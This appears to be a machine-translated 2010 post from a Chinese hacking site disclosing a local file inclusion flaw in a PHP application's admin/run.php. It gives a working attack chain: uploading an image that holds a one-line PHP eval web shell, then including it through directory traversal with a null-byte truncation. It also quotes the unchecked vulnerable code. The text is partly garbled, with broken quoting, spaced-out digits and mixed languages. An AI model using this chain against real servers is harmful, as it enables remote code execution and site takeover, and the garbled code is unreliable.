1 6 2 1 0 0 Site Navigation 1. 9 local file inclusion vulnerability-vulnerability warning-the black bar safety net

ID MYHACK58:62201028209
Type myhack58
Reporter 佚名
Modified 2010-10-28T00:00:00


Breaking app breaking vulnerability, but in order to encourage everyone to learn, or sent to. Reject malicious destruction!

Program official: http://download.162100.com

admin directory run.php the file part of the code is as follows:I find the Upload Directory


Use the upload image function, 上传一个1.jpg the content of <? php eval($_POST[cmd])?& gt;

获得 地址 editor/images/upload/2010102718265325.jpg

Then admin/run. php? run=../../editor/images/upload/2 0 1 0 1 0 2 7 1 8 2 6 5 3 2 5. jpg%0 0

That is a word. The rest you know....

| 1 | &lt;? php ---|---

2 | if($_REQUEST['run"] && file_exists('./ run/".$ _REQUEST['run"].'. php")) ` ---|---

3 | require_once('./ run/".$ _REQUEST['run"].'. php");//here to judge as long as the file exists, it may contain, without any limitation, may be the directory jump, so as long as you can upload a file, then%0 0 truncated, you can upload ` ---|---

4 | else ---|---

5 | alert('command error or a function has not been opened!",'./ index.html"); ` ---|---

6 | ?&gt; ---|---


I'll Upload a phpinfo schematic below.! A one! Though a broken program. However, the penetration time will inevitably encounter it. Hope you also share out the usual day stop the process inadvertently dug some program vulnerabilities. Joint learning. Also save more time

This program also cookies spoofing and other vulnerabilities.... and Significance does not too. Enough on the line

Starter tools Lu Yu